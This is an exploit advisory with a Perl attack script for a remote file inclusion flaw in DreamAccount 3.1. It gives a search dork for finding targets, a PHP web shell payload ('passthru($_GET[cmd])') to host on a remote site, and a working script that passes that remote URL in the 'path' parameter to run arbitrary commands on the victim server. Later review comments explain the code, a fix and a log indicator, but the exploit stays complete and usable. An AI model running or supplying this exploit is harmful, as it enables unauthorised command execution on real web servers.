----------------------------------------------------

DREAMACCOUNT V3.1 Command Execution Exploit         

----------------------------------------------------

Discovered By CrAsh_oVeR_rIdE(Arabian Security Team)

Coded By Drago84(Exclusive Security Team)           

----------------------------------------------------

site of script:http://dreamcost.com                 

----------------------------------------------------

Vulnerable: DREAMACCOUNT V3.1                       

----------------------------------------------------

vulnerable file :                                    

------------------                                  

/admin/index.php                                    

----------------------------------------------------

vulnerable code:                                    

----------------------------------------------------

// Excerpt from /admin/index.php as quoted by the advisory.
// NOTE(review): $path is not assigned anywhere in this excerpt; the advisory
// reports that it can be supplied by the request (?path=...), in which case
// all three require() calls load files from a caller-chosen location.
// TODO confirm against the full file.
require($path . "setup.php");

require($path . "functions.php");

require($path . "payment_processing.inc.php");

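The $path parameter is used as the prefix of these require() calls without validation, so a value supplied in the request (?path=...) decides which files are included. This is a file inclusion flaw, and where PHP is permitted to include remote URLs it results in command execution. Fix: assign $path a fixed server-side value before the require() calls and never take it from request input.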

----------------------------------------------------

#!/usr/bin/perl

use HTTP::Request;

use LWP::UserAgent;

# Startup banner. These prints run unconditionally, before any argument
# check: title, search string, credits and the expected argument order.
print 
"\n=============================================================================\r\n";

print " * Dreamaccount Remote Command Execution  23/06/06 *\r\n";   

print 
"=============================================================================\r\n";

print "[*] dork:\"powered by DreamAccount 3.1\"\n";

print "[*] Coded By : Drago84 \n";

print "[*] Discovered by CrAsH_oVeR_rIdE\n";

print "[*] Use <site> <dir_Dream> <eval site> <cmd>\n";

# Describes the content expected at <eval site>. The literal markers
# "Exclusive" and "/Exclusive" are the delimiters the response parser at the
# end of this script searches for.
print " Into the Eval Site it must be:\n\n";

# NOTE(review): the string is double-quoted, so Perl interpolates
# `$_GET[cmd]` instead of printing it literally.
print " Exclusive <?php  passthru($_GET[cmd]); ?> /Exclusive";


# Argument guard: with fewer than four command-line arguments, print the
# usage text and a sample output line, then exit without sending anything.
if (@ARGV < 4)

{

print "\n\n[*] usage: perl dream.pl <site> <dir dream> <eval site> <cmd>\n";

# This string literal contains a real line break between the two lines below.
print "[*] usage: perl dream.pl www.HosT.com /dreamaccount/ 
http://www.site.org/doc.jpg id\n";

print "[*] uid=90(nobody) gid=90(nobody) egid=90(nobody) \n";

exit();

}

# Positional arguments, in command-line order: site, application directory,
# URL passed as the `path` value, and the string passed as `cmd`.
my $dir=$ARGV[1];

my $host=$ARGV[0];

my $eval=$ARGV[2];

my $cmd=$ARGV[3];

# The request URL is built by plain string concatenation; no argument is
# validated or URL-encoded. Resulting shape:
#   <site><dir>/admin/index.php?path=<eval site>?&cmd=<cmd>
# Detection: in web-server logs, a request to /admin/index.php whose `path`
# query parameter carries a URL is the indicator for this issue.
my $url2=$host.$dir."/admin/index.php?path=".$eval."?&cmd=".$cmd;

# Sends a single GET request for $url2 through LWP::UserAgent.
print "\n";

my $req=HTTP::Request->new(GET=>$url2);

my $ua=LWP::UserAgent->new();

# Give up after 10 seconds.
$ua->timeout(10);

my $response=$ua->request($req);

# Only a successful HTTP response is handled. There is no else branch, so a
# failed request prints nothing.
if ($response->is_success) {

print "\n\nResult of:".$cmd."\n";

# Captures the text between "Exclusive" and "/Exclusive" in the response
# body. `.+` is greedy and /s lets it span newlines, so it runs to the last
# "/Exclusive". $pezzo_utile receives the capture but is never read.
my ($pezzo_utile) = ( $response->content =~ m{Exclusive(.+)\/Exclusive}smx );

# NOTE(review): printf uses the captured, server-supplied text as its format
# string, so any '%' sequences in it are interpreted rather than printed
# literally. If the pattern did not match, $1 is not set by this statement.
printf $1;

# Evaluated in void context; this statement has no effect.
$response->content;

print "\n";


} 

----------------------------------------------------------------------------------------------------

Discovered By CrAsh_oVeR_rIdE

Coded By  Drago84

E-mail:[EMAIL PROTECTED]

Site:www.lezr.com

Greetz:KING-HACKER,YOUNG_HACKER

,SIMO,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3,Mr.hcR 
AND ALL LEZR.COM Member
